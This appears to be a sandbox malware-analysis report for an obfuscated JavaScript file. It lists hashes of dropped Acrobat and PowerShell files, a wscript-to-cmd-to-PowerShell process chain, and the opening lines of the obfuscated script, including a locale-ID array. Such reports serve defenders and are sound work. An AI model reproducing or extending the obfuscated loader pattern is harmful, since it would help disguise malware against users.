SHA-512: | 38657569CEC153ECE39C270B720D008FEBC5C7E4925C12AA1517B4316546D7EA96D41FBDE11F05A680253FB6E2025F5935816E8FB0131E269A58BCBB887F7837 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.268268220784461 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfbPtdPeUkwRe9:YvXKXFOsCYCbsdTeOPGDV8Ukee9 |
MD5: | FFC370577F7A48FE416C890C33C4C7A4 |
SHA1: | 272E09461AC6852BE4D02A9AE6B843DA9AD07302 |
SHA-256: | 460E5A4EE5406916D2CC79CC9470508D34F46DC8EA75624FD73F4D50B0EFDA05 |
SHA-512: | 67B3F9AECA40F5B997EF7BA7F7D5972802B694E78B7FC4BBAC3E80C86EEB022756883053356F1A334E3C86533388ADDB4A6DECEB82A47A5706B1256F2661595F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.273002592988256 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJf21rPeUkwRe9:YvXKXFOsCYCbsdTeOPG+16Ukee9 |
MD5: | F9E3C7B5E1F354609E142E056075370E |
SHA1: | 29255BE3DDEE5B15E46008D730B47A6F7F4F2BC5 |
SHA-256: | B08CD1E975CD1CF9B6C8EB1F482943437BCBC6A7C36B3B1DD40AF7C0DC963665 |
SHA-512: | 7331CF6C5E7E3534E006B982C11C3CCC48CD733B24D987262AFEAD8AD463007BCF7CDE4F2F1B92825096C364D604289AB6700994654EC446D1E8B2AE40BE3206 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.658056494321822 |
Encrypted: | false |
SSDEEP: | 24:Yv6XoQCbmeOQamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSX:YvhQhePBgkDMUJUAh8cvMX |
MD5: | 57FF42CCEB855B33B3EECB3E507AA07C |
SHA1: | D475BA14136766726AAC74E029A1F85013793777 |
SHA-256: | 2D6AC48CAD231A56DBED09CF4F44B416BD69F6D10D4EE33370EC5B3A57134E12 |
SHA-512: | 96812B4914A36DDB53146245D5D2C6E6154007F94513EF3C33720B9FC532FEA55AA558C67C69F429174C33544F69ADA00CFB4377A1776D05AE069F368BCE4F2D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2495900077780195 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfshHHrPeUkwRe9:YvXKXFOsCYCbsdTeOPGUUUkee9 |
MD5: | ECB4215B83FC46920A91182890123FAA |
SHA1: | 9E1EDEEDC4C62518275924EB7B6205E5416ABEBD |
SHA-256: | C3D1093473C11C86BD3C4115FE322B8E8335A5857C3F8C31D0E033F0B5A9E584 |
SHA-512: | 5CA84AC9EC0BD0E27981712873520E123EB9C7E3B69228A84040CB67A002A00DB500468DB67B50A5056D4E949093C0393DF9386D2165BED8081042C83CC647AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.26683597033306 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJTqgFCrPeUkwRe9:YvXKXFOsCYCbsdTeOPGTq16Ukee9 |
MD5: | B1BE7747DFB1F71D21DD4177024C9729 |
SHA1: | 64DDD2B9E7CEB01FFB251DA97512B52D8115B220 |
SHA-256: | 2968DD0F66965CF0F45D6C66B7D472BC989E1A8D30A176C657ED4643298BD9C1 |
SHA-512: | 65D62AAE23AD46D322547853EA63D76E34D790C5F6A8EEBA0EA574B51ED435372F2C980C3869A374E1DE7FDD755DEFF4EC196389EFA24C769BD7D355D900A4B4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.137577497443646 |
Encrypted: | false |
SSDEEP: | 48:Y00ofnkZAFg0yCeQ4myEypx0O6Kvmr2I/z4D9+nC:r7Fq44mHVrF4xN |
MD5: | 5BE7D8BFF772EB453C2AD0663D123DB5 |
SHA1: | 7D925F3CBEB5AB5923A1D6E95FE8436C0503DEE1 |
SHA-256: | 504E96A1CB6A08619C630B14181FA339419FE73AAC6DCE45F37983E700BD590B |
SHA-512: | 076D8B707919B201A3B25E85EAE0A3604F76C50A580536F37FEC4D5092B637E2F612C757AE2F6D8028C55A55C21B6928F96D531C7E5A753684CF6C9278DC4AA2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.454678974722171 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsDWldg:lNVmsw3SHtbDbPe0K3+fDZdM4g |
MD5: | 15900136469A6D2E2645A60BC3DC0002 |
SHA1: | 714E5934C53A93D02E7B4FD47CE4AB34AB660D18 |
SHA-256: | AE453ACEB092378D7EB00A831D98E5653F5466D4DB92DBF2A51CE1BCBC543D49 |
SHA-512: | 2B0118184D5B0D1ECFEBE16701E9EF50A2F60DAF8D9E3B0C4BAFBD6500791EA06B8FC39B0175E72735980BFD404DFB27B1F619621CC07AA97B5C0D2E5835FBFA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.9565844237033825 |
Encrypted: | false |
SSDEEP: | 48:7MIrvrBd6dHtbGIbPe0K3+fDy2dsDHQqFl2GL7msL0:753SHtbDbPe0K3+fDZdMwKVmsL0 |
MD5: | F07ABF24AF7BC1A4F02C0323B7174A32 |
SHA1: | 3FD4F1694867AC4F448F6BAEC65D0647C8706D3D |
SHA-256: | A48EEDF52BCCE92C8032985337C76077D1AFB5E45EE99EA5BCB48D9F31AF245F |
SHA-512: | 48989D4D98CA310745EAB6E96FA239A964D477C14BF4D36095993487FBC53817CEA575F3570315AC52646A3BA41312043B1D54092667DC32DD633314A9CCF107 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgVt74UMctz5l/lY6MESH1dDkgGXYyu:6a6TZ44ADEVt7Mc/l/lMDkHXK |
MD5: | C842D8E352F699568EA767AEB60181BD |
SHA1: | 58F72574992304DDADD27AB2B2B0B173D9D7A78C |
SHA-256: | 69AF8699EA8E4E4FD84B72F0968FCDE169DE2976ECA6B8FB38D471564744543B |
SHA-512: | 914E9F68D8BE70496522644E843E481FCA08AA8CCF0BD5AE8E5AEA6412A14C16843EF3105E0916A51C4E64DF9607836357493AFF592BC107B05886B5F4DC44DD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllultnxj:NllU |
MD5: | F93358E626551B46E6ED5A0A9D29BD51 |
SHA1: | 9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03 |
SHA-256: | 0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D |
SHA-512: | D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4965336456103326 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebCl8V:Qw946cPbiOxDlbYnuRK+bD |
MD5: | B2FA2FEBA1DE294C9A5BA22EADB2D852 |
SHA1: | F7A1FF30818FF23CDD24460BDE599461FD0C0343 |
SHA-256: | 4FFB54BB44D899F3D6C98DD4B188BACD98E8BA21F84426B7D8272B5A2ECC9EA8 |
SHA-512: | 1304966D7A3203C6A1B419504E4E2531CADAA8A4C61ED32E9AC5D5B70786E0DA3EBFA4C38973EDEB16522626FEA8516AED542DF34A6FF681A5521605C690187B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 20-21-38-098.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.373339549768609 |
Encrypted: | false |
SSDEEP: | 384:h2S/Si4Qqczrsm3ZpM/ArpYlF2dobp5D2JDgRg/gHgxgRk98tdX7ttupwLwL2nXQ:h5l |
MD5: | A541453902C144BFF780A6D828F11C21 |
SHA1: | 6956D8A8CEBCE89AC41948008C0D62C289BD2189 |
SHA-256: | CE859852C7AC37B8E945209DD48AC20D016D7924564B5BCC389F3C36EEF2CBCE |
SHA-512: | BC63402B3D4261EC62FFA2EAD48CC6E725538F78EA8032FD9E99F1FBD984A25FD52F9BC926AE67A7B848719980AEE7788673D5C862874A5E3CEACD5997AFA276 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.408850391725535 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRKR:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRW |
MD5: | FDF0C96B6F2EADD01C695A656DD66BEB |
SHA1: | F61F227B53FFE7D6111B070F3E5E0FF14E9377A4 |
SHA-256: | EF05588D8E1B4687BE3D9CD25A0D1D46952D8311C600C69AEA65783787E46149 |
SHA-512: | 38393C44AAF2A3D06DEBA6F4D6D6958AAF9164F19B87907917AA00F2EE10E6E56A3F6AE8D6D34049BA3D6D8F4180566C1EE277AB025F01C3A44733C23868A7FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/n5ZwYIGNPzWL07o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:xZwZG5WLxB3mlind9i4ufFXpAXkrfUsb |
MD5: | E78E4D1CA18BE28748F65C3A192DAFB2 |
SHA1: | 78AD6025CB470EFB9ECA8FF1ED41F617372D1F9F |
SHA-256: | F4B25F5C5BE48E151080D9CC24C8A4662CBB591A6B32037DB8D7ADE1828D8849 |
SHA-512: | E170C9BD3B6BB575244FCD380334D763C30352586F60824A67868EAE8E895BE0601D51670FCC304724BDF321CE8EF64881E606C9CF4C18C5817DFB5A679E44D6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:6DaWL07oXGZGwYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:caWLxXGZGwZGh3mlind9i4ufFXpAXkru |
MD5: | 7867DAFF192926A49EB7516D226D452F |
SHA1: | BD0B185B12DB865CEA23060A9789C6B2D814B62E |
SHA-256: | C7586BA81615BBAA63DA0D81CE18C0D087D1237500C99C35239A4D3CAEED2934 |
SHA-512: | B556042E82056983EA6A69AEE0DAB370641437EF6239FD04676FC26EC9472C6E5EF6194885C165E3987E8019321DCD9B4A574EA7A6253AC3C9468434AEAA0C21 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.917901301119626 |
TrID: | |
File name: | 1792532021822412669.js |
File size: | 19'680 bytes |
MD5: | 444c0b1447233a1c29c0c81173c77f3c |
SHA1: | 0135b9cdbeb0f506f9ce703367a115011829e432 |
SHA256: | 6739f585f07a977088989b9cdf9f2329e39dead46bb9f015197b95dc2632274d |
SHA512: | fcd6e434d12cfe4768ea476fe9ae5456081def40b7ec163ad909fefb12a6872e43ca506e334e20e809210a63ebc0e140e429722bb14dbc6fca8378df780b3031 |
SSDEEP: | 192:ZZgkkgB7V6CQ6yb9yVBOckDcNe3YGJwtvH2ga9DH9fxJ3X7G7earWmetlaKQm1lq:x7V6CQz9yVB1kDcDa3jarWTqvF |
TLSH: | 109285D9C80BA75FCDF841D1E7A552D306D092A88FF9E18E9078309419CAAF475F3635 |
File Content Preview: | function gwqahus(){zvjklj=[1031,3079,5127,4103,2055,3072];var dcsbspm=this[tmuhd+fveok+hyordii+tqqojyh+brpiwcxb+voqlcbg+otndqvis+japevka](this[wnqpgnpkm+gzklyfbt+yztlfs+hyordii+oqfrecwkj+tmuhd+japevka][ftrzooc+hyordii+brpiwcxb+fveok+japevka+brpiwcxb+gpoge |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 20:21:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff711790000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 20:21:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff602360000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 20:21:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 20:21:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 20:21:34 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 11 |
Start time: | 20:21:34 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff602360000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 20:21:34 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ef2d0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 14 |
Start time: | 20:21:35 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 15 |
Start time: | 20:21:35 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 16 |
Start time: | 20:21:36 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function gwqahus() { |
|
1 | zvjklj = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
